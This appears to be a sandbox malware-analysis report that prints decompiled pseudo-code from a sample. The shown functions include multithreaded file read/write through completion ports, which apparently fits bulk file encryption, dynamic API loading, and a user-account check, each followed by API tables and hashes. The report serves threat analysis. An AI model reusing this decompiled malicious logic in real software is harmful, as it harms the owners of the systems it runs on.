									 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x28));
									 *(_t92 + 0x30) = 0;
								} else {
									 *(_t92 + 0x30) = 2;
								}
							} else {
								 *(_t92 + 0x14) =  *(_t92 + 0x14) + 0x80000;
								asm("adc dword [ebx+0x18], 0x0");
								 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x24)) - 1;
								 *(_t92 + 0x30) = 0;
							}
							_t78 = WriteFile( *(_t92 + 0x2c), _t92 + 0x104, _v12,  &_v12, _t92); // executed
							if(_t78 == 0 &&  *[fs:0x34] != 0x3e5) {
								CloseHandle( *(_t92 + 0x2c));
								RtlFreeHeap( *0xcf0a9e, 0, _t92);
							}
							continue;
						}
						 *(_t92 + 8) =  *(_t92 + 0x14);
						 *(_t92 + 0xc) =  *(_t92 + 0x18);
						 *(_t92 + 0x30) = 1;
						_t85 = ReadFile( *(_t92 + 0x2c), _t92 + 0x104, 0x80000,  &_v12, _t92); // executed
						if(_t85 != 0) {
							L15:
							continue;
						}
						if( *[fs:0x34] != 0x26) {
							if( *[fs:0x34] == 0x3e5) {
								goto L15;
							}
							CloseHandle( *(_t92 + 0x2c));
							RtlFreeHeap( *0xcf0a9e, 0, _t92);
							continue;
						}
						goto L3;
					}
					return _t54;
				}
			}

0x00ce5e7c
0x00ce5e90
0x00ce5e96
0x00ce5e9b
0x00ce5e9b
0x00ce5e9d
0x00ce5ea5
0x00ce5ec5
0x00ce5ec8
0x00ce5ed7
0x00ce5e7c
0x00ce5e90
0x00ce5e96
0x00ce5e9b
0x00ce5e9b
0x00000000
0x00ce5e9b
0x00000000
0x00ce5e7c
0x00ce5ea7
0x00ce5ea7
0x00ce5ec3
0x00000000
0x00ce5edf
0x00000000
0x00ce5eea
0x00ce5eec
0x00ce5ef3
0x00ce5ef8
0x00ce5f73
0x00ce6031
0x00ce6099
0x00ce6111
0x00000000
0x00ce6111
0x00ce609b
0x00ce60a7
0x00ce60a7
0x00ce60b6
0x00ce60c7
0x00ce60cd
0x00ce60e9
0x00ce60e9
0x00ce60f1
0x00ce6100
0x00ce610b
0x00000000
0x00ce610b
0x00ce6033
0x00ce603a
0x00ce6041
0x00ce605b
0x00ce6063
0x00ce6075
0x00ce6084
0x00ce6084
0x00000000
0x00ce6063
0x00ce5f8e
0x00ce5f97
0x00ce5fb0
0x00ce5fb9
0x00ce5fc9
0x00ce5fcc
0x00ce5fd2
0x00ce5fd5
0x00ce5fc0
0x00ce5fc0
0x00ce5fc0
0x00ce5f99
0x00ce5f99
0x00ce5fa0
0x00ce5fa4
0x00ce5fa7
0x00ce5fa7
0x00ce5ff0
0x00ce5ff8
0x00ce600a
0x00ce6019
0x00ce6019
0x00000000
0x00ce5ff8
0x00ce5f00
0x00ce5f03
0x00ce5f06
0x00ce5f23
0x00ce5f2b
0x00ce5f66
0x00000000
0x00ce5f66
0x00ce5f35
0x00ce5f47
0x00000000
0x00000000
0x00ce5f4c
0x00ce5f5b
0x00000000
0x00ce5f5b
0x00000000
0x00ce5f37
0x00000000
0x00ce5eec

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,000000FF), ref: 00CE5E90
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000), ref: 00CE5EBB
CloseHandle.KERNEL32(?), ref: 00CE5EC8
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE5ED7

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CompletionQueuedStatus$CloseFreeHandleHeapPost
String ID:
API String ID: 3286583680-0
Opcode ID: 964b3fb06c808ea7fc1ee3d109a72fdff54adbefedb837c28064ebf01619e461
Instruction ID: 557faec50ad413214aa3317fb10833a6a0ee232b661fbf7c0c0d9ad455a326b1
Opcode Fuzzy Hash: 964b3fb06c808ea7fc1ee3d109a72fdff54adbefedb837c28064ebf01619e461
Instruction Fuzzy Hash: 98719D71100644EFDF119F92DDC8BAA7BBDFB08718F204261ED158A0A7D7749A44DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6B07, Relevance: 25.7, APIs: 17, Instructions: 182
threadsleepCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00CE6B07(WCHAR* _a4) {
				long _v8;
				intOrPtr _v12;
				union _ULARGE_INTEGER _v16;
				intOrPtr _v32;
				char _v52;
				char _v180;
				int _t17;
				int _t21;
				void* _t27;
				intOrPtr _t29;
				void* _t39;
				long _t40;
				long _t41;
				long _t42;
				long _t45;
				void* _t46;
				long _t47;
				long _t48;
				void* _t49;
				void* _t51;

				_t17 = GetDiskFreeSpaceExW(_a4,  &_v16, 0, 0); // executed
				if(_t17 == 0 || _v12 != 0 || _v16.LowPart >= 0x6400000) {
					if( *0xcf07f7 != 0) {
						_v8 = GetTickCount();
					}
					 *0xcf0de2( &_v52); // executed
					_t39 =  >  ? 0x20 : _v32;
					 *0xcf102c = 0;
					 *0xcf1030 = 0;
					 *0xcf1034 = 0;
					 *0xcf1038 = 0;
					 *0xcf103c = 0;
					 *0xcf1040 = 0;
					 *0xcf1044 = 0;
					_t21 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
					 *0xcf1024 = _t21;
					if( *0xcf1024 != 0) {
						_t21 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
						 *0xcf1028 = _t21;
						if( *0xcf1028 != 0) {
							do {
								CreateThread(0, 0, E00CE5BCC, 0, 0, 0); // executed
								asm("stosd");
								 *0xcf102c =  *0xcf102c + 1;
								 *0xcf1034 =  *0xcf1034 + 1;
								CreateThread(0, 0, E00CE5E73, 0, 0, 0); // executed
								asm("stosd");
								 *0xcf1030 =  *0xcf1030 + 1;
								 *0xcf1034 =  *0xcf1034 + 1;
								_t39 = _t39 - 1;
							} while (_t39 != 0);
							if( *0xcf092c != 0) {
								 *0xcf0cfa( &_v180, 0xceb44c,  *0xcf1034);
								_t51 = _t51 + 0xc;
								E00CE3E63( *0xcf092c, 0xceb20a,  &_v180, 0, 0);
							}
							E00CE67AD(_a4);
							_t48 =  *0xcf1038; // 0x34
							_t49 = _t48 +  *0xcf1040;
							_t45 =  *0xcf103c; // 0x34
							_t46 = _t45 +  *0xcf1044;
							while(_t49 != _t46) {
								_t47 =  *0xcf103c; // 0x34
								_t46 = _t47 +  *0xcf1044;
								Sleep(0x64);
							}
							_t40 =  *0xcf102c; // 0x4
							do {
								PostQueuedCompletionStatus( *0xcf1024, 0, 0, 0);
								_t40 = _t40 - 1;
							} while (_t40 != 0);
							_t41 =  *0xcf1030; // 0x4
							do {
								PostQueuedCompletionStatus( *0xcf1028, 0, 0, 0);
								_t41 = _t41 - 1;
							} while (_t41 != 0);
							_t27 = WaitForMultipleObjects( *0xcf1034, 0xcf1048, 1, 0xffffffff);
							do {
								asm("lodsd");
								_t27 = CloseHandle(_t27);
								 *0xcf1034 =  *0xcf1034 - 1;
							} while ( *0xcf1034 != 0);
							if( *0xcf1024 != 0) {
								_t21 = CloseHandle( *0xcf1024);
							}
							if( *0xcf1028 != 0) {
								_t21 = CloseHandle( *0xcf1028);
							}
							if( *0xcf092c != 0) {
								_t42 =  *0xcf103c; // 0x34
								 *0xcf0cfa( &_v180, 0xceb47e, _t42 +  *0xcf1044);
								_t21 = E00CE3E63( *0xcf092c, 0xceb20a,  &_v180, 0, 0);
							}
							if( *0xcf07f7 != 0) {
								_t29 = GetTickCount() - _v8;
								 *0xcf0ab2 = _t29;
								return _t29;
							}
						}
					}
					return _t21;
				} else {
					return _t17;
				}
			}

0x00ce6b20
0x00ce6b28
0x00ce6b4b
0x00ce6b53
0x00ce6b53
0x00ce6b5a
0x00ce6b6a
0x00ce6b6d
0x00ce6b77
0x00ce6b81
0x00ce6b8b
0x00ce6b95
0x00ce6b9f
0x00ce6ba9
0x00ce6bbb
0x00ce6bc1
0x00ce6bcd
0x00ce6bdb
0x00ce6be1
0x00ce6bed
0x00ce6bf9
0x00ce6c08
0x00ce6c0e
0x00ce6c0f
0x00ce6c15
0x00ce6c2a
0x00ce6c30
0x00ce6c31
0x00ce6c37
0x00ce6c3d
0x00ce6c3e
0x00ce6c49
0x00ce6c5d
0x00ce6c63
0x00ce6c7c
0x00ce6c7c
0x00ce6c84
0x00ce6c89
0x00ce6c8f
0x00ce6c95
0x00ce6c9b
0x00ce6cb7
0x00ce6ca3
0x00ce6ca9
0x00ce6cb1
0x00ce6cb1
0x00ce6cbb
0x00ce6cc1
0x00ce6ccd
0x00ce6cd3
0x00ce6cd4
0x00ce6cd8
0x00ce6cde
0x00ce6cea
0x00ce6cf0
0x00ce6cf1
0x00ce6d04
0x00ce6d10
0x00ce6d10
0x00ce6d12
0x00ce6d18
0x00ce6d1e
0x00ce6d2e
0x00ce6d36
0x00ce6d36
0x00ce6d43
0x00ce6d4b
0x00ce6d4b
0x00ce6d58
0x00ce6d5a
0x00ce6d73
0x00ce6d92
0x00ce6d92
0x00ce6d9e
0x00ce6da6
0x00ce6da9
0x00000000
0x00ce6da9
0x00ce6d9e
0x00ce6bed
0x00ce6db6
0x00ce6b41
0x00ce6b41
0x00ce6b41

APIs

GetDiskFreeSpaceExW.KERNEL32(00CE6F02,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CE6B20
GetTickCount.KERNEL32 ref: 00CE6B4D
GetNativeSystemInfo.KERNEL32(?,?,?,00000000), ref: 00CE6B5A
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00CE6BBB
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00CE6BDB
CreateThread.KERNEL32(00000000,00000000,00CE5BCC,00000000,00000000,00000000), ref: 00CE6C08
CreateThread.KERNEL32(00000000,00000000,00CE5E73,00000000,00000000,00000000), ref: 00CE6C2A
_swprintf.NTDLL ref: 00CE6C5D
Sleep.KERNEL32(00000064,00CE6F02,?,?,00000000), ref: 00CE6CB1
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 00CE6CCD
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 00CE6CEA
WaitForMultipleObjects.KERNEL32(00CF1048,00000001,000000FF,?,?,00000000), ref: 00CE6D04
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00CE6D12
CloseHandle.KERNEL32(?,?,00000000), ref: 00CE6D36
CloseHandle.KERNEL32(?,?,00000000), ref: 00CE6D4B
_swprintf.NTDLL ref: 00CE6D73
GetTickCount.KERNEL32 ref: 00CE6DA0

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CompletionCreate$CloseHandle$CountPortPostQueuedStatusThreadTick_swprintf$DiskFreeInfoMultipleNativeObjectsSleepSpaceSystemWait
String ID:
API String ID: 2032800378-0
Opcode ID: 20a25560eaed70e2cf095276db572dffc40159fc3ac37e3d601ef718cb98b07f
Instruction ID: 125669d571f0eecdbd17289500247e9e23304ac952c63a25c9f71a4fc6a3b0ac
Opcode Fuzzy Hash: 20a25560eaed70e2cf095276db572dffc40159fc3ac37e3d601ef718cb98b07f
Instruction Fuzzy Hash: 02617E716403C0EFE7209F56EC89FBD3B75E714B55F380125EA11A61E2CBB42984CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00CE182A, Relevance: 22.7, APIs: 15, Instructions: 248
libraryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00CE182A() {
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				void* _t61;
				struct HINSTANCE__* _t63;
				void* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				struct HINSTANCE__* _t73;
				void* _t76;
				struct HINSTANCE__* _t78;
				void* _t81;
				struct HINSTANCE__* _t83;
				void* _t86;
				struct HINSTANCE__* _t88;
				void* _t91;
				struct HINSTANCE__* _t93;
				void* _t96;
				struct HINSTANCE__* _t98;
				void* _t101;
				struct HINSTANCE__* _t103;
				void* _t106;
				struct HINSTANCE__* _t108;
				void* _t111;
				struct HINSTANCE__* _t113;
				void* _t116;
				struct HINSTANCE__* _t118;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t162;
				void* _t163;
				void* _t164;
				CHAR* _t168;
				CHAR* _t169;
				CHAR* _t170;
				CHAR* _t171;
				CHAR* _t172;
				CHAR* _t173;
				CHAR* _t174;
				CHAR* _t175;
				CHAR* _t176;
				CHAR* _t177;
				CHAR* _t178;
				CHAR* _t179;
				CHAR* _t180;
				CHAR* _t181;

				E00CE16D5(0xcea004,  *0x00CEA000);
				E00CE13DA(LoadLibraryA(0xcea004), 0xcea004,  *((intOrPtr*)(0xcea000)));
				_t168 =  &(0xcea004[ *((intOrPtr*)(0xcea000))]);
				_t51 = E00CE1AC3(_t48, 0x23, _t168);
				asm("lodsd");
				E00CE16D5(_t168, _t51);
				E00CE13DA(LoadLibraryA(_t168), _t168,  *((intOrPtr*)(_t168 - 4)));
				_t169 =  &(_t168[ *((intOrPtr*)(_t168 - 4))]);
				_t56 = E00CE1AC3(_t53, 0x39, _t169);
				asm("lodsd");
				E00CE16D5(_t169, _t56);
				_t58 = LoadLibraryA(_t169); // executed
				_t153 = _t152;
				E00CE13DA(_t58, _t169,  *((intOrPtr*)(_t169 - 4)));
				_t170 =  &(_t169[ *((intOrPtr*)(_t169 - 4))]);
				_t61 = E00CE1AC3(_t58, 0x18, _t170);
				asm("lodsd");
				E00CE16D5(_t170, _t61);
				_t63 = LoadLibraryA(_t170); // executed
				_t154 = _t153;
				E00CE13DA(_t63, _t170,  *((intOrPtr*)(_t170 - 4)));
				_t171 =  &(_t170[ *((intOrPtr*)(_t170 - 4))]);
				_t66 = E00CE1AC3(_t63, 6, _t171);
				asm("lodsd");
				E00CE16D5(_t171, _t66);
				_t68 = LoadLibraryA(_t171); // executed
				_t155 = _t154;
				E00CE13DA(_t68, _t171,  *((intOrPtr*)(_t171 - 4)));
				_t172 =  &(_t171[ *((intOrPtr*)(_t171 - 4))]);
				_t71 = E00CE1AC3(_t68, 6, _t172);
				asm("lodsd");
				E00CE16D5(_t172, _t71);
				_t73 = LoadLibraryA(_t172); // executed
				_t156 = _t155;
				E00CE13DA(_t73, _t172,  *((intOrPtr*)(_t172 - 4)));
				_t173 =  &(_t172[ *((intOrPtr*)(_t172 - 4))]);
				_t76 = E00CE1AC3(_t73, 1, _t173);
				asm("lodsd");
				E00CE16D5(_t173, _t76);
				_t78 = LoadLibraryA(_t173); // executed
				_t157 = _t156;
				E00CE13DA(_t78, _t173,  *((intOrPtr*)(_t173 - 4)));
				_t174 =  &(_t173[ *((intOrPtr*)(_t173 - 4))]);
				_t81 = E00CE1AC3(_t78, 3, _t174);
				asm("lodsd");
				E00CE16D5(_t174, _t81);
				_t83 = LoadLibraryA(_t174); // executed
				_t158 = _t157;
				E00CE13DA(_t83, _t174,  *((intOrPtr*)(_t174 - 4)));
				_t175 =  &(_t174[ *((intOrPtr*)(_t174 - 4))]);
				_t86 = E00CE1AC3(_t83, 2, _t175);
				asm("lodsd");
				E00CE16D5(_t175, _t86);
				_t88 = LoadLibraryA(_t175);
				_t159 = _t158;
				E00CE13DA(_t88, _t175,  *((intOrPtr*)(_t175 - 4)));
				_t176 =  &(_t175[ *((intOrPtr*)(_t175 - 4))]);
				_t91 = E00CE1AC3(_t88, 6, _t176);
				asm("lodsd");
				E00CE16D5(_t176, _t91);
				_t93 = LoadLibraryA(_t176);
				_t160 = _t159;
				E00CE13DA(_t93, _t176,  *((intOrPtr*)(_t176 - 4)));
				_t177 =  &(_t176[ *((intOrPtr*)(_t176 - 4))]);
				_t96 = E00CE1AC3(_t93, 0xd, _t177);
				asm("lodsd");
				E00CE16D5(_t177, _t96);
				_t98 = LoadLibraryA(_t177);
				_t161 = _t160;
				E00CE13DA(_t98, _t177,  *((intOrPtr*)(_t177 - 4)));
				_t178 =  &(_t177[ *((intOrPtr*)(_t177 - 4))]);
				_t101 = E00CE1AC3(_t98, 4, _t178);
				asm("lodsd");
				E00CE16D5(_t178, _t101);
				_t103 = LoadLibraryA(_t178); // executed
				_t162 = _t161;
				E00CE13DA(_t103, _t178,  *((intOrPtr*)(_t178 - 4)));
				_t179 =  &(_t178[ *((intOrPtr*)(_t178 - 4))]);
				_t106 = E00CE1AC3(_t103, 2, _t179);
				asm("lodsd");
				E00CE16D5(_t179, _t106);
				_t108 = LoadLibraryA(_t179); // executed
				_t163 = _t162;
				E00CE13DA(_t108, _t179,  *((intOrPtr*)(_t179 - 4)));
				_t180 =  &(_t179[ *((intOrPtr*)(_t179 - 4))]);
				_t111 = E00CE1AC3(_t108, 4, _t180);
				asm("lodsd");
				E00CE16D5(_t180, _t111);
				_t113 = LoadLibraryA(_t180); // executed
				_t164 = _t163;
				E00CE13DA(_t113, _t180,  *((intOrPtr*)(_t180 - 4)));
				_t181 =  &(_t180[ *((intOrPtr*)(_t180 - 4))]);
				_t116 = E00CE1AC3(_t113, 8, _t181);
				asm("lodsd");
				E00CE16D5(_t181, _t116);
				_push(_t164);
				_t118 = LoadLibraryA(_t181); // executed
				E00CE13DA(_t118, _t181,  *((intOrPtr*)(_t181 - 4)));
				return E00CE1AC3(_t118, 1,  &(_t181[ *((intOrPtr*)(_t181 - 4))]));
			}

0x00ce183f
0x00ce1850
0x00ce1858
0x00ce1860
0x00ce1865
0x00ce1868
0x00ce1879
0x00ce1881
0x00ce1889
0x00ce188e
0x00ce1891
0x00ce1898
0x00ce189f
0x00ce18a4
0x00ce18ac
0x00ce18b4
0x00ce18b9
0x00ce18bc
0x00ce18c3
0x00ce18ca
0x00ce18cf
0x00ce18d7
0x00ce18df
0x00ce18e4
0x00ce18e7
0x00ce18ee
0x00ce18f5
0x00ce18fa
0x00ce1902
0x00ce190a
0x00ce190f
0x00ce1912
0x00ce1919
0x00ce1920
0x00ce1925
0x00ce192d
0x00ce1935
0x00ce193a
0x00ce193d
0x00ce1944
0x00ce194b
0x00ce1950
0x00ce1958
0x00ce1960
0x00ce1965
0x00ce1968
0x00ce196f
0x00ce1976
0x00ce197b
0x00ce1983
0x00ce198b
0x00ce1990
0x00ce1993
0x00ce199a
0x00ce19a1
0x00ce19a6
0x00ce19ae
0x00ce19b6
0x00ce19bb
0x00ce19be
0x00ce19c5
0x00ce19cc
0x00ce19d1
0x00ce19d9
0x00ce19e1
0x00ce19e6
0x00ce19e9
0x00ce19f0
0x00ce19f7
0x00ce19fc
0x00ce1a04
0x00ce1a0c
0x00ce1a11
0x00ce1a14
0x00ce1a1b
0x00ce1a22
0x00ce1a27
0x00ce1a2f
0x00ce1a37
0x00ce1a3c
0x00ce1a3f
0x00ce1a46
0x00ce1a4d
0x00ce1a52
0x00ce1a5a
0x00ce1a62
0x00ce1a67
0x00ce1a6a
0x00ce1a71
0x00ce1a78
0x00ce1a7d
0x00ce1a85
0x00ce1a8d
0x00ce1a92
0x00ce1a95
0x00ce1a9a
0x00ce1a9c
0x00ce1aa8
0x00ce1ac2

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00CE7E9F,00CED4CD,00CED4DD,00000010), ref: 00CE1845

Part of subcall function 00CE1AC3: GetProcAddress.KERNEL32(00000000), ref: 00CE1AD0

LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00CE7E9F,00CED4CD,00CED4DD), ref: 00CE186E
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,?), ref: 00CE1898
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE18C3
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE18EE
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE1919
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE1944
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE196F
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE199A
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE19C5
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE19F0
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE1A1B
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE1A46
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE1A71
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?,?), ref: 00CE1A9C

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProc
String ID:
API String ID: 1469910268-0
Opcode ID: 7d5d8eb531d8ec47475e8fe8587bfda943d80f8af523ac8738a732d24bd9a448
Instruction ID: 31edabbf08ffe836ed7684b6bfae5372968bc097475b2a42d469f59f1c12b6d8
Opcode Fuzzy Hash: 7d5d8eb531d8ec47475e8fe8587bfda943d80f8af523ac8738a732d24bd9a448
Instruction Fuzzy Hash: 9B61C1752119A16FF613B7628D42DBFB2EDDF863047084818FA4267512CBB42E2377A6

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3573, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE3573() {
				char* _v8;
				void* _v12;
				void* _v16;
				char* _v20;
				char* _t30;
				int _t31;
				char _t35;

				_v8 = 0;
				_v16 = 0;
				_v20 = 0;
				_v20 = E00CE1AEC(0xcebb38);
				if(_v20 != 0) {
					_t30 = E00CE301C(); // executed
					_v8 = _t30;
					if(_v8 != 0) {
						_t31 = strlen(_v20);
						_v16 = RtlAllocateHeap( *0xcf0a9e, 8, strlen(_v8) + _t31 + 0x1c);
						if(_v16 != 0) {
							_t35 = E00CE1AEC(0xcebb6b);
							_v12 = _t35;
							if(_v12 != 0) {
								_t35 = E00CE31EE(_v16, sprintf(_v16, _v20, _v12, "060108efb510c98", _v8)); // executed
							}
						}
					}
				}
				if(_v12 != 0) {
					_t35 = RtlFreeHeap( *0xcf0a9e, 0, _v12);
				}
				if(_v8 != 0) {
					_t35 = RtlFreeHeap( *0xcf0a9e, 0, _v8);
				}
				if(_v20 != 0) {
					_t35 = RtlFreeHeap( *0xcf0a9e, 0, _v20);
				}
				if(_v16 == 0) {
					return _t35;
				} else {
					return RtlFreeHeap( *0xcf0a9e, 0, _v16);
				}
			}

0x00ce357e
0x00ce3585
0x00ce358c
0x00ce359d
0x00ce35a4
0x00ce35ab
0x00ce35b0
0x00ce35b7
0x00ce35be
0x00ce35e8
0x00ce35ef
0x00ce35f8
0x00ce35fd
0x00ce3604
0x00ce3626
0x00ce3626
0x00ce3604
0x00ce35ef
0x00ce35b7
0x00ce362f
0x00ce363c
0x00ce363c
0x00ce3646
0x00ce3653
0x00ce3653
0x00ce365d
0x00ce366a
0x00ce366a
0x00ce3674
0x00ce368f
0x00ce3676
0x00000000
0x00ce3681

APIs

Part of subcall function 00CE1AEC: RtlAllocateHeap.NTDLL(00000000,?), ref: 00CE1B04

RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE363C
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE3653
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE366A
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE3681

Strings

060108efb510c98, xrefs: 00CE360B

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$Allocate
String ID: 060108efb510c98
API String ID: 3472947110-3678944367
Opcode ID: 5ea39348188929df3fa4dc6fd5accfe35c1f4a06fa11dfdf88d8d8ef7f0ce112
Instruction ID: 95e526951678934bea2e63de42c312102ab4bbfdec523992fc0e57d306d1bf0d
Opcode Fuzzy Hash: 5ea39348188929df3fa4dc6fd5accfe35c1f4a06fa11dfdf88d8d8ef7f0ce112
Instruction Fuzzy Hash: EB31EB71900288FFDB11ABA2DD0DBBDBB76FB04705F204065F511621B2C7762B94EB56

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4A20, Relevance: 15.1, APIs: 10, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00CE4A20() {
				void* _v8;
				union _SID_NAME_USE _v12;
				long _v16;
				long _v20;
				short _v148;
				short _v276;
				long _v280;
				void _v320;
				int _t23;
				int _t30;
				union _TOKEN_INFORMATION_CLASS _t43;
				void* _t44;
				void* _t45;

				_t43 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v8) == 0) {
					L11:
					return _t43;
				}
				_t23 = GetTokenInformation(_v8, 1,  &_v320, 0x28,  &_v280); // executed
				if(_t23 != 0) {
					_v16 = 0x80;
					_v20 = 0x80;
					_v12 = 1;
					_t30 = LookupAccountSidW(0, _v320,  &_v148,  &_v16,  &_v276,  &_v20,  &_v12); // executed
					if(_t30 != 0) {
						_t44 = E00CE1AEC(0xceaf02);
						_push(_t44);
						_push( &_v276);
						if( *0xcf0cd6() != 0) {
							RtlFreeHeap( *0xcf0a9e, 0, _t44);
							_t45 = E00CE1AEC(0xceaee6);
							_push(_t45);
							_push( &_v276);
							if( *0xcf0cd6() != 0) {
								RtlFreeHeap( *0xcf0a9e, 0, _t45);
								_t45 = E00CE1AEC(0xceaec8);
								_push(_t45);
								_push( &_v276);
								if( *0xcf0cd6() == 0) {
									_t43 = 1;
								}
							} else {
								_t43 = 1;
							}
						} else {
							_t43 = 1;
						}
						RtlFreeHeap( *0xcf0a9e, 0, _t45);
					}
				}
				CloseHandle(_v8);
				goto L11;
			}

0x00ce4a2e
0x00ce4a40
0x00ce4b5c
0x00ce4b66
0x00ce4b66
0x00ce4a5b
0x00ce4a63
0x00ce4a69
0x00ce4a70
0x00ce4a77
0x00ce4aa2
0x00ce4aaa
0x00ce4aba
0x00ce4abc
0x00ce4ac3
0x00ce4acf
0x00ce4ae1
0x00ce4af1
0x00ce4af3
0x00ce4afa
0x00ce4b06
0x00ce4b18
0x00ce4b28
0x00ce4b2a
0x00ce4b31
0x00ce4b3d
0x00ce4b3f
0x00ce4b3f
0x00ce4b08
0x00ce4b08
0x00ce4b08
0x00ce4ad1
0x00ce4ad1
0x00ce4ad1
0x00ce4b4d
0x00ce4b4d
0x00ce4aaa
0x00ce4b56
0x00000000

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,00000010), ref: 00CE4A38
